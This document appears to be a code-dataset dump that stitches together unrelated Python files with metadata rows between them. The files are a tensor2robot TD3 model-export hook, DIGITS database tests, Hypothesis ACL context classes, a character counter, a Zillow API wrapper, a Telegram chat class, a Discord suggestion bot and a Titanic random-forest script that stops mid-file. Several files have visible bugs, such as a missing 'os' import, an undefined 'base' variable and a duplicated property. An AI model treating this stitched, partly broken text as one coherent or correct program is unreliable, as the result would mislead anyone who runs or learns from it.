import tempfile
import gin
from tensor2robot.export_generators import abstract_export_generator
from tensor2robot.export_generators import default_export_generator
from tensor2robot.hooks import checkpoint_hooks
from tensor2robot.hooks import hook_builder
from tensor2robot.models import model_interface
from tensor2robot.proto import t2r_pb2
from tensor2robot.utils import tensorspec_utils
import tensorflow.compat.v1 as tf # tf
from typing import Text, List, Optional
from tensorflow.contrib import tpu as contrib_tpu
@gin.configurable
class TD3Hooks(hook_builder.HookBuilder):
"""Creates hooks for exporting models for serving in TD3 distributed training.
See:
"Addressing Function Approximation Error in Actor-Critic Methods"
by Fujimoto et al.
https://arxiv.org/abs/1802.09477
These hooks manage exporting of SavedModels to two different directories:
`export_dir` contains the latest version of the model, `lagged_export_dir`
contains a lagged version, delayed by one interval of `save_secs`.
Attributes:
export_dir: Directory to output the latest models.
lagged_export_dir: Directory containing a lagged version of SavedModels
save_secs: Interval to save models, and copy the latest model from
`export_dir` to `lagged_export_dir`.
num_versions: Number of model versions to save in each directory
use_preprocessed_features: Whether to export SavedModels which do *not*
incldue preprocessing. This is useful for offloading the preprocessing
graph to the client.
export_generator: The export generator used to generate the
serving_input_receiver_fn.
"""
def __init__(
self,
export_dir,
lagged_export_dir,
batch_sizes_for_export,
save_secs = 90,
num_versions = 3,
use_preprocessed_features=False,
export_generator = None,
):
super(TD3Hooks, self).__init__()
self._save_secs = save_secs
self._num_versions = num_versions
self._export_dir = export_dir
self._lagged_export_dir = lagged_export_dir
self._batch_sizes_for_export = batch_sizes_for_export
if export_generator is None:
self._export_generator = default_export_generator.DefaultExportGenerator()
else:
self._export_generator = export_generator
def create_hooks(
self,
t2r_model,
estimator,
):
if not self._export_dir and not self._lagged_export_dir:
return []
self._export_generator.set_specification_from_model(t2r_model)
warmup_requests_file = self._export_generator.create_warmup_requests_numpy(
batch_sizes=self._batch_sizes_for_export,
export_dir=estimator.model_dir)
in_feature_spec = t2r_model.get_feature_specification_for_packing(
mode=tf.estimator.ModeKeys.PREDICT)
in_label_spec = t2r_model.get_label_specification_for_packing(
mode=tf.estimator.ModeKeys.PREDICT)
t2r_assets = t2r_pb2.T2RAssets()
t2r_assets.feature_spec.CopyFrom(in_feature_spec.to_proto())
t2r_assets.label_spec.CopyFrom(in_label_spec.to_proto())
def _export_fn(export_dir, global_step):
"""The actual closure function creating the exported model and assets."""
t2r_assets.global_step = global_step
tmpdir = tempfile.mkdtemp()
t2r_assets_filename = os.path.join(tmpdir,
tensorspec_utils.T2R_ASSETS_FILENAME)
tensorspec_utils.write_t2r_assets_to_file(t2r_assets, t2r_assets_filename)
res = estimator.export_saved_model(
export_dir_base=export_dir,
serving_input_receiver_fn=self._export_generator
.create_serving_input_receiver_numpy_fn(),
assets_extra={
'tf_serving_warmup_requests': warmup_requests_file,
tensorspec_utils.T2R_ASSETS_FILENAME: t2r_assets_filename
})
return res
return [
contrib_tpu.AsyncCheckpointSaverHook(
save_secs=self._save_secs,
checkpoint_dir=estimator.model_dir,
listeners=[
checkpoint_hooks.LaggedCheckpointListener(
export_fn=_export_fn,
num_versions=self._num_versions,
export_dir=self._export_dir,
lagged_export_dir=self._lagged_export_dir)
])
]
| 37.536765 | 80 | 0.740646 |
ace73ed2ca5f335add944b9f17d85298f18772e1 | 7,731 | py | Python | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 111 | 2017-04-21T06:03:04.000Z | 2021-04-26T06:36:54.000Z | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 6 | 2017-05-15T22:02:49.000Z | 2018-03-16T10:25:26.000Z | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 40 | 2017-04-21T07:04:16.000Z | 2019-11-14T14:20:32.000Z | # Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from collections import Counter
import os.path
import shutil
import tempfile
import Queue
import nose.tools
import numpy as np
import PIL.Image
from . import create_db
from digits import test_utils
test_utils.skipIfNotFramework('none')
class BaseTest():
"""
Provides some helpful files and utilities
"""
@classmethod
def setUpClass(cls):
cls.empty_file = tempfile.mkstemp()
cls.empty_dir = tempfile.mkdtemp()
# Create one good textfile
cls.good_file = tempfile.mkstemp()
# Create a color image
cls.color_image_file = tempfile.mkstemp(suffix='.png')
cls.numpy_image_color = np.ones((8, 10, 3), dtype='uint8')
cls.pil_image_color = PIL.Image.fromarray(cls.numpy_image_color)
cls.pil_image_color.save(cls.color_image_file[1])
# Create a grayscale image
cls.gray_image_file = tempfile.mkstemp(suffix='.png')
cls.numpy_image_gray = np.ones((8, 10), dtype='uint8')
cls.pil_image_gray = PIL.Image.fromarray(cls.numpy_image_gray)
cls.pil_image_gray.save(cls.gray_image_file[1])
cls.image_count = 0
for i in xrange(3):
for j in xrange(3):
os.write(cls.good_file[0], '%s %s\n' % (cls.color_image_file[1], i))
os.write(cls.good_file[0], '%s %s\n' % (cls.gray_image_file[1], i))
cls.image_count += 2
@classmethod
def tearDownClass(cls):
for f in cls.empty_file, cls.good_file, cls.color_image_file, cls.gray_image_file:
try:
os.close(f[0])
os.remove(f[1])
except OSError:
pass
try:
shutil.rmtree(cls.empty_dir)
except OSError:
raise
class TestFillLoadQueue(BaseTest):
def test_valid_file(self):
for shuffle in True, False:
yield self.check_valid_file, shuffle
def check_valid_file(self, shuffle):
queue = Queue.Queue()
result = create_db._fill_load_queue(self.good_file[1], queue, shuffle)
assert result == self.image_count, 'lines not added'
assert queue.qsize() == self.image_count, 'queue not full'
def test_empty_file(self):
for shuffle in True, False:
yield self.check_empty_file, shuffle
def check_empty_file(self, shuffle):
queue = Queue.Queue()
nose.tools.assert_raises(
create_db.BadInputFileError,
create_db._fill_load_queue,
self.empty_file[1], queue, shuffle)
class TestParseLine():
def test_good_lines(self):
for label, line in [
(0, '/path/image.jpg 0'),
(1, 'image.jpg 1'),
(2, 'image.jpg 2\n'),
(3, 'image.jpg 3'),
(4, 'spaces in filename.jpg 4'),
]:
yield self.check_good_line, line, label
def check_good_line(self, line, label):
c = Counter()
p, l = create_db._parse_line(line, c)
assert l == label, 'parsed label wrong'
assert c[l] == 1, 'distribution is wrong'
def test_bad_lines(self):
for line in [
'nolabel.jpg',
'non-number.jpg five',
'negative.jpg -1',
]:
yield self.check_bad_line, line
def check_bad_line(self, line):
nose.tools.assert_raises(
create_db.ParseLineError,
create_db._parse_line,
line, Counter()
)
class TestCalculateBatchSize():
def test(self):
for count, batch_size in [
(1, 1),
(50, 50),
(100, 100),
(200, 100),
]:
yield self.check, count, batch_size
def check(self, count, batch_size):
assert create_db._calculate_batch_size(count) == batch_size
class TestCalculateNumThreads():
def test(self):
for batch_size, shuffle, num in [
(1000, True, 10),
(1000, False, 1),
(100, True, 10),
(100, False, 1),
(50, True, 7),
(4, True, 2),
(1, True, 1),
]:
yield self.check, batch_size, shuffle, num
def check(self, batch_size, shuffle, num):
assert create_db._calculate_num_threads(
batch_size, shuffle) == num
class TestInitialImageSum():
def test_color(self):
s = create_db._initial_image_sum(10, 10, 3)
assert s.shape == (10, 10, 3)
assert s.dtype == 'float64'
def test_grayscale(self):
s = create_db._initial_image_sum(10, 10, 1)
assert s.shape == (10, 10)
assert s.dtype == 'float64'
class TestImageToDatum(BaseTest):
def test(self):
for compression in None, 'png', 'jpg':
yield self.check_color, compression
yield self.check_grayscale, compression
def check_color(self, compression):
d = create_db._array_to_datum(self.numpy_image_color, 1, compression)
assert d.height == self.numpy_image_color.shape[0]
assert d.width == self.numpy_image_color.shape[1]
assert d.channels == 3
assert d.encoded == bool(compression)
def check_grayscale(self, compression):
d = create_db._array_to_datum(self.numpy_image_gray, 1, compression)
assert d.height == self.numpy_image_gray.shape[0]
assert d.width == self.numpy_image_gray.shape[1]
assert d.channels == 1
assert d.encoded == bool(compression)
class TestSaveMeans():
def test(self):
for color in True, False:
d = tempfile.mkdtemp()
for filename in 'mean.jpg', 'mean.png', 'mean.npy', 'mean.binaryproto':
yield self.check, d, filename, color
shutil.rmtree(d)
def check(self, directory, filename, color):
filename = os.path.join(directory, filename)
if color:
s = np.ones((8, 10, 3), dtype='float64')
else:
s = np.ones((8, 10), dtype='float64')
create_db._save_means(s, 2, [filename])
assert os.path.exists(filename)
class BaseCreationTest(BaseTest):
def test_image_sizes(self):
for width in 8, 12:
for channels in 1, 3:
yield self.check_image_sizes, width, channels, False
def check_image_sizes(self, width, channels, shuffle):
create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
width, 10, channels, self.BACKEND)
def test_no_shuffle(self):
create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
10, 10, 1, self.BACKEND, shuffle=False)
def test_means(self):
mean_files = []
for suffix in 'jpg', 'npy', 'png', 'binaryproto':
mean_files.append(os.path.join(self.empty_dir, 'mean.%s' % suffix))
create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
10, 10, 1, self.BACKEND, mean_files=mean_files)
class TestLmdbCreation(BaseCreationTest):
BACKEND = 'lmdb'
class TestHdf5Creation(BaseCreationTest):
BACKEND = 'hdf5'
def test_dset_limit(self):
db_dir = os.path.join(self.empty_dir, 'db')
create_db.create_db(self.good_file[1], db_dir,
10, 10, 1, 'hdf5', hdf5_dset_limit=10 * 10)
with open(os.path.join(db_dir, 'list.txt')) as infile:
lines = infile.readlines()
assert len(lines) == self.image_count, '%d != %d' % (len(lines), self.image_count)
| 31.048193 | 94 | 0.585823 |
ace73f8d80e2563c56832ce5bc80706d1a256a30 | 7,159 | py | Python | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"Context resource" objects for Pyramid views.
Context objects are reusable components that represent "the context of a view"
or "the subject of a view".
They can do things like wrap a model object (or multiple model objects) and,
since they have access to the ``request`` object, provide access to properties
that you need the request to compute such as permissions, or route URLs for a
wrapped model object. The view, or any code that the view calls and passes the
context object into, can then make use of these properties.
These context objects are returned by the root resources in
:py:mod:`h.traversal.roots` if the route is configured to use one of those root
factories (see the :py:mod:`h.traversal.roots` for usage).
For such a route Pyramid will conveniently pass the found context object into
the view callable as the ``context`` argument.
"""
from pyramid.security import DENY_ALL
from pyramid.security import Allow
from pyramid.security import principals_allowed_by_permission
from h.auth import role
from h.models.organization import ORGANIZATION_DEFAULT_PUBID
class AnnotationContext:
"""Context for annotation-based views."""
def __init__(self, annotation, group_service, links_service):
self.group_service = group_service
self.links_service = links_service
self.annotation = annotation
@property
def group(self):
return self.group_service.find(self.annotation.groupid)
@property
def links(self):
return self.links_service.get_all(self.annotation)
def link(self, name):
return self.links_service.get(self.annotation, name)
def __acl__(self):
"""Return a Pyramid ACL for this annotation."""
# If the annotation has been deleted, nobody has any privileges on it
# any more.
if self.annotation.deleted:
return [DENY_ALL]
acl = []
# For shared annotations, some permissions are derived from the
# permissions for this annotation's containing group.
# Otherwise they are derived from the annotation's creator
if self.annotation.shared:
for principal in self._group_principals(self.group, "read"):
acl.append((Allow, principal, "read"))
for principal in self._group_principals(self.group, "flag"):
acl.append((Allow, principal, "flag"))
for principal in self._group_principals(self.group, "moderate"):
acl.append((Allow, principal, "moderate"))
else:
acl.append((Allow, self.annotation.userid, "read"))
# Flagging one's own private annotations is nonsensical,
# but from an authz perspective, allowed. It is up to services/views
# to handle these situations appropriately
acl.append((Allow, self.annotation.userid, "flag"))
# The user who created the annotation always has the following permissions
for action in ["admin", "update", "delete"]:
acl.append((Allow, self.annotation.userid, action))
# If we haven't explicitly authorized it, it's not allowed.
acl.append(DENY_ALL)
return acl
@staticmethod
def _group_principals(group, principal):
if group is None:
return []
principals = principals_allowed_by_permission(group, principal)
return principals
class OrganizationContext:
"""Context for organization-based views."""
def __init__(self, organization, request):
# TODO Links service
self.organization = organization
self.request = request
@property
def id(self):
return self.organization.pubid # Web-facing unique ID for this resource
@property
def default(self):
return self.id == ORGANIZATION_DEFAULT_PUBID
@property
def links(self):
# TODO
return {}
@property
def logo(self):
if self.organization.logo:
return self.request.route_url(
"organization_logo", pubid=self.organization.pubid
)
return None
class GroupContext:
"""Context for group-based views."""
def __init__(self, group, request):
self.request = request
self.group = group
self.links_service = self.request.find_service(name="group_links")
@property
def id(self):
return self.group.pubid # Web-facing unique ID for this resource
@property
def links(self):
return self.links_service.get_all(self.group)
@property
def organization(self):
if self.group.organization is not None:
return OrganizationContext(self.group.organization, self.request)
return None
class GroupUpsertContext:
"""Context for group UPSERT"""
def __init__(self, group, request):
self._request = request
self.group = group
def __acl__(self):
"""
Get the ACL from the group model or set "upsert" for all users in absence of model
If there is a group model, get the ACL from there. Otherwise, return an
ACL that sets the "upsert" permission for authenticated requests that have
a real user associated with them via :attr:`h.auth.role.User`.
The "upsert" permission is an unusual hybrid. It has a different meaning
depending on the upsert situation.
If there is no group associated with the context, the "upsert" permission
should be given to all real users such that they may use the UPSERT endpoint
to create a new group. However, if there is a group associated with the
context, the "upsert" permission is managed by the model. The model only
applies "upsert" for the group's creator. This will allow the endpoint to
support updating a specific group (model), but only if the request's
user should be able to update the group.
"""
# TODO: This and ``GroupContext`` can likely be merged once ``GroupContext``
# is used more resource-appropriately and returned by :class:`h.traversal.roots.GroupRoot`
# during traversal
if self.group is not None:
return self.group.__acl__()
return [(Allow, role.User, "upsert")]
class UserContext:
"""
Context for user-centered views
.. todo:: Most views still traverse using ``username`` and work directly
with User models (:class:`h.models.User`). This context should be
expanded as we continue to move over to a more resource-based approach.
"""
def __init__(self, user):
self.user = user
def __acl__(self):
"""
Set the "read" permission for AuthClients that have a matching authority
to the user. This supercedes the ACL in :class:`h.models.User`.
.. todo:: This ACL should be expanded (as needed) as more views make use of
a context versus a model directly.
"""
acl = []
user_authority_principal = f"client_authority:{self.user.authority}"
acl.append((Allow, user_authority_principal, "read"))
return acl
| 34.253589 | 98 | 0.666853 |
ace73f941bd0e1cd18742b6d9572258a8bd4840b | 878 | py | Python | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 47 | 2020-09-26T01:30:44.000Z | 2021-12-14T13:44:49.000Z | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 32 | 2019-10-16T14:46:24.000Z | 2020-08-24T05:24:30.000Z | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 302 | 2020-09-25T20:07:33.000Z | 2021-11-01T07:38:04.000Z | # This is a simple Python program that counts the number of characters within the provided string
def how_many_times_in(string):
char_results = dict()
for char in string:
if char not in char_results:
char_results[char] = 1
else:
char_results[char] += 1
return char_results
def main():
char_results = how_many_times_in("Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc accumsan sem ut ligula scelerisque sollicitudin. Ut at sagittis augue. Praesent quis rhoncus justo. Aliquam erat volutpat. Donec sit amet suscipit metus, non lobortis massa. Vestibulum augue ex, dapibus ac suscipit vel, volutpat eget massa. Donec nec velit non ligula efficitur luctus.")
for character in sorted(char_results):
print(character + ": " + str(char_results[character]))
if __name__ == "__main__":
main()
| 35.12 | 387 | 0.716401 |
ace740bb11065942646dda8555fb704ac5564539 | 89 | py | Python | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 9 | 2019-05-05T20:59:25.000Z | 2021-07-30T16:49:04.000Z | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 1 | 2019-05-17T13:33:36.000Z | 2019-05-17T13:33:36.000Z | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 7 | 2019-03-09T14:51:08.000Z | 2021-07-26T10:03:40.000Z | # -*- coding: utf-8 -*-
"""Unit test package for {{ cookiecutter.project_slug }}."""
| 22.25 | 61 | 0.58427 |
ace742000d6523291bd254ef2517fbae422987bb | 2,079 | py | Python | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | 1 | 2017-05-02T10:34:26.000Z | 2017-05-02T10:34:26.000Z | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | null | null | null | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | null | null | null | import requests
import xmltodict
import os
class Zillow(object):
"""A python wrapper for the Zillow Home API"""
def __init__(self):
self.ZWSID = os.environ['ZWSID']
self.base = "https://www.zillow.com/webservice/"
def GetSearchResults(self, address, citystatezip):
data = {'zws-id' : self.ZWSID,'address' : address,'citystatezip': citystatezip}
response = requests.get(self.base + "GetSearchResults.htm",params=data)
if response.status_code == 200:
return xmltodict.parse(response.text)
else:
return response.status_code
def GetZestimate(self, zpid):
data = {'zws-id' : self.ZWSID, 'zpid' : zpid}
response = requests.get(base + "GetZestimate.htm",params=data)
if response.status_code == 200:
return xmltodict.parse(response.text)
else:
return response.status_code
def GetChart(self,zpid,unit_type, width, height, duration):
data = {'zws-id' : self.ZWSID,
'zpid' : zpid,
'unit-type' : unit_type,
'width' : width,
'height' : height,
'chartDuration' : duration}
response = requests.get(self.base + "GetChart.htm",params=data)
if response.status_code == 200:
return xmltodict.parse(response.text)
else:
return response.status_code
def GetComps(self, zpid, count):
data = {'zws-id' : self.ZWSID, 'zpid' : zpid, 'count': count}
response = requests.get(self.base + "GetComps.htm",params=data)
if response.status_code == 200:
return xmltodict.parse(response.text)
else:
return response.status_code
def GetDeepComps(self, zpid, count):
data = {'zws-id' : self.ZWSID, 'zpid' : zpid, 'count': count}
response = requests.get(self.base + "GetDeepComps.htm",params=data)
if response.status_code == 200:
return xmltodict.parse(response.text)
else:
return response.status_code
| 33 | 87 | 0.596922 |
ace74288420727c76ad7ea06d94b4f37f4c90ccd | 5,798 | py | Python | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | 16 | 2019-03-15T16:25:24.000Z | 2022-01-28T14:05:01.000Z | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | null | null | null | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | 1 | 2021-07-03T16:52:59.000Z | 2021-07-03T16:52:59.000Z | import threading
from telegram import telegram as tg
from utils import database as db
chatsLock = threading.Lock()
chats = {}
def getChat(chatId : str):
with chatsLock:
if chatId not in chats:
chats[chatId] = Chat(chatId)
return chats[chatId]
def initChats():
with chatsLock:
chatIds = db.getAllChatPartners()
for chatId in chatIds:
chats[chatId] = Chat(chatId)
def deleteUser(chatId):
with chatsLock:
if chatId in chats: # necessary, otherwise multiple deletions -> error
del chats[chatId]
db.deleteUser(chatId)
class Chat:
def __init__(self, chatId:str):
self._chatId = chatId
self._activeMsgGroups = set()
self._editLaterLock = threading.Lock()
self._notifications = [] # all upsolving etc. msgs to be grouped
self._notificationLock = threading.Lock()
infos = db.queryChatInfos(chatId)
if infos is None:
self._apikey = None
self._secret = None
self._timezone = None
self._handle = None
self._notifyLevel = 3 # everything except in contest notifications
self._polite = False
self._reply = True
self._width = 6
self._reminder2h = True
self._reminder1d = True
self._reminder3d = False
self._settings_msgid = None
self._updateDB()
else:
(self._apikey, self._secret, self._timezone, self._handle,
self._notifyLevel,
self._polite, self._reply, self._width,
self._reminder2h, self._reminder1d, self._reminder3d,
self._settings_msgid) = infos
if self._timezone is None:
self._timezone = "UTC"
@property
def chatId(self):
return self._chatId
@chatId.setter
def chatId(self, chatId:str):
self._chatId = chatId
self._updateDB()
@property
def apikey(self):
return self._apikey
@apikey.setter
def apikey(self, key):
self._apikey = key
self._updateDB()
@property
def secret(self):
return self._secret
@secret.setter
def secret(self, scr):
self._secret = scr
self._updateDB()
@property
def timezone(self):
return self._timezone
@timezone.setter
def timezone(self, tz):
self._timezone = tz
self._updateDB()
@property
def handle(self):
return self._handle
@handle.setter
def handle(self, h):
self._handle = h
self._updateDB()
@property
def notifyLevel(self):
return self._notifyLevel
@notifyLevel.setter
def notifyLevel(self, l):
self._notifyLevel = l
self._updateDB()
@property
def polite(self):
return self._polite
@polite.setter
def polite(self, l):
self._polite = l
self._updateDB()
@property
def reply(self):
return self._reply
@reply.setter
def reply(self, newVal):
self._reply = newVal
self._updateDB()
@property
def width(self):
return self._width
@width.setter
def width(self, newVal):
self._width = newVal
self._updateDB()
@property
def reminder2h(self):
return self._reminder2h
@reminder2h.setter
def reminder2h(self, newVal):
self._reminder2h = newVal
self._updateDB()
@property
def reminder1d(self):
return self._reminder1d
@reminder1d.setter
def reminder1d(self, newVal):
self._reminder1d = newVal
self._updateDB()
@property
def reminder1d(self):
return self._reminder1d
@reminder1d.setter
def reminder1d(self, newVal):
self._reminder1d = newVal
self._updateDB()
@property
def reminder3d(self):
return self._reminder3d
@reminder3d.setter
def reminder3d(self, newVal):
self._reminder3d = newVal
self._updateDB()
@property
def settings_msgid(self):
return self._settings_msgid
@settings_msgid.setter
def settings_msgid(self, newVal):
self._settings_msgid = newVal
self._updateDB()
def _updateDB(self):
db.updateChatInfos(self.chatId, self.apikey, self.secret, self.timezone,
self.handle, self.notifyLevel,
self.polite, self.reply, self.width, self.reminder2h,
self.reminder1d, self.reminder3d, self.settings_msgid)
def sendMessage(self, text, reply_markup = None, callback=None):
if self.chatId == '0':
print('\n----- message sent: ------------\n' + text + "\n--------- End Message ----------\n")
return 0
else:
tg.requestSpooler.put(lambda : tg.sendMessage(self.chatId, text, reply_markup, callback), priority=0)
# message which can be grouped
def sendNotification(self, text):
if self.chatId == '0':
print('\n----- message sent: ------------\n' + text + "\n--------- End Message ----------\n")
return
def sendGroupedNotifications():
with self._notificationLock:
msgText = "\n".join(self._notifications)
self._notifications = []
tg.sendMessage(self._chatId, msgText)
with self._notificationLock:
self._notifications.append(text)
if len(self._notifications) == 1: # add to spooler queue
tg.requestSpooler.put(sendGroupedNotifications, priority=1)
def editMessageText(self, msgId, msg, reply_markup = None):
if self.chatId == '0':
print('\n----- message edited to: ---------\n' + msg + "\n--------- End Message ----------\n")
else:
tg.requestSpooler.put(lambda : tg.editMessageText(self.chatId, msgId, msg, reply_markup), priority=0)
def editMessageTextLater(self, msgId, msgGroup, fun):
if self.chatId == '0':
msg = fun(self, msgGroup)
if msg:
print('\n----- message sent: ------------\n' + msg + "\n--------- End Message ----------\n")
return
with self._editLaterLock:
if msgGroup not in self._activeMsgGroups:
self._activeMsgGroups.add(msgGroup)
else:
return
def editMsgNow():
msg = fun(self, msgGroup)
if msg:
tg.editMessageText(self.chatId, msgId, msg)
with self._editLaterLock:
self._activeMsgGroups.remove(msgGroup)
tg.requestSpooler.put(editMsgNow, priority=2)
def deleteMessage(self, msgId):
if self.chatId == '0':
print('\n----- message deleted:' + msgId + '---------\n')
else:
tg.requestSpooler.put(lambda : tg.deleteMessage(self.chatId, msgId), priority=1)
| 23.762295 | 104 | 0.692308 |
ace74328c77e125b61791e5ad9237cd17ae5aa83 | 3,861 | py | Python | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 6 | 2018-06-23T10:22:07.000Z | 2021-07-12T15:09:28.000Z | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-29T22:25:45.000Z | 2020-11-01T00:12:55.000Z | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 6 | 2019-02-18T17:15:04.000Z | 2021-07-17T11:48:39.000Z | import discord
from discord.ext import commands
from discord import utils
import asyncio
import time
import json
extensions = ["settings", "developer", "suggest", "general"]
def get_prefix(bot, message):
"""Get the prefixes."""
gprefix = client.config["GLOBAL"]["PREFIX"]
if message.guild is None:
extras = gprefix
return commands.when_mentioned_or(*extras)(bot, message)
prefix = client.config["GUILDS"][str(message.guild.id)]["PREFIX"]
extras = [prefix, gprefix]
return commands.when_mentioned_or(*extras)(bot, message)
client = commands.Bot(command_prefix=get_prefix)
with open('settings.json', 'r') as f:
client.config = json.load(f)
async def add_guild():
if not "GUILDS" in client.config:
client.config["GUILDS"] = {}
for guild in client.guilds:
gid = str(guild.id)
if gid not in client.config["GUILDS"]:
client.config["GUILDS"][gid] = {
"TOGGLED": "ON",
"TOGGLEPM": "OFF",
"OUTPUT": None,
"ID": "1",
"PREFIX": "!"
}
print(f"Added new server to the config file ({guild.name})")
with open('settings.json', 'w') as f:
json.dump(client.config, f, indent=2)
@client.event
async def on_guild_join(guild):
await add_guild()
embed = discord.Embed(title=f':tools: Suggestion Bot', color=0xffffff)
embed.add_field(name=f'Thanks for adding suggestion bot {guild.owner.name}!', value=f'To configure the bot use **!settings** in a server text channel. To see the available commands do: **!help**, \nplease make sure the bot has the following permission: `Administrator` or the following: `Manage messages`, `Add reactions`, `Read messages`, `Send messages`, `Read message history`, `Embed links` and `Attach file`')
embed.add_field(name=f'Links', value=f'[Source Code](https://github.com/DerpDays/Suggestion-Bot) | [Support Server](http://discord.gg/8nG3FkS) | [Suppoort Me](http://paypal.me/DerpDays)')
await guild.owner.send(embed=embed)
@client.event
async def on_ready():
print('-------------------------------------------------------------')
print('Bot created by @DerpDays#0001')
print('You may not remove the credit,')
print('However you can expand the bot.')
print('If you have any issues please contact me on discord')
print('Or create a issue on GitHub')
print('-------------------------------------------------------------')
await client.change_presence(activity=discord.Activity(name='Suggestion Bot | !help', type=0))
await add_guild()
if __name__ == '__main__':
for extension in extensions:
try:
client.load_extension("extensions." + extension)
except Exception as e:
print("")
print("TRACEBACK")
print("--------------------------------")
print(e)
print("--------------------------------")
print('Failed to load extension {}'.format(extension))
print("")
try:
client.run(client.config["GLOBAL"]["TOKEN"], bot=True, reconnect=True)
except:
print("---------------------------------------------------------------------")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
print("---------------------------------------------------------------------")
time.sleep(10)
| 41.516129 | 419 | 0.575499 |
ace74384f21d3b9c6bd12457f62336e5b41329f6 | 3,241 | py | Python | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | print('Importing libraries...')
import numpy as np
import pandas as pd
from sklearn import cross_validation as cv
from sklearn.cross_validation import KFold
from sklearn.ensemble import RandomForestClassifier
print('Fetching the training and test datasets...')
train = pd.read_csv("./input/train.csv", dtype={"Age": np.float64}, )
test = pd.read_csv("./input/test.csv", dtype={"Age": np.float64}, )
print('Cleaning the dataset...')
def harmonize_data(titanic):
# Filling the blank data
titanic["Age"] = titanic["Age"].fillna(titanic["Age"].mean())
titanic["Fare"] = titanic["Fare"].fillna(titanic["Fare"].mean())
titanic["Embarked"] = titanic["Embarked"].fillna("S")
# Assigning binary form to data for calculation purpose
titanic.loc[titanic["Sex"] == "male", "Sex"] = 1
titanic.loc[titanic["Sex"] == "female", "Sex"] = 0
titanic.loc[titanic["Embarked"] == "S", "Embarked"] = 0
titanic.loc[titanic["Embarked"] == "C", "Embarked"] = 1
titanic.loc[titanic["Embarked"] == "Q", "Embarked"] = 2
return titanic
print('Defining submission file...')
def create_submission(rfc, train, test, predictors, filename):
rfc.fit(train[predictors], train["Survived"])
predictions = rfc.predict(test[predictors])
submission = pd.DataFrame({
"PassengerId": test["PassengerId"],
"Survived": predictions
})
submission.to_csv(filename, index=False)
print('Defining the clean dataset...')
train_data = harmonize_data(train)
test_data = harmonize_data(test)
print('Performing feature enginnering...')
train_data["PSA"] = train_data["Pclass"]*train_data["Sex"]*train_data["Age"]
train_data["SP"] = train_data["SibSp"]+train_data["Parch"]
test_data["PSA"] = test_data["Pclass"]*test_data["Sex"]*test_data["Age"]
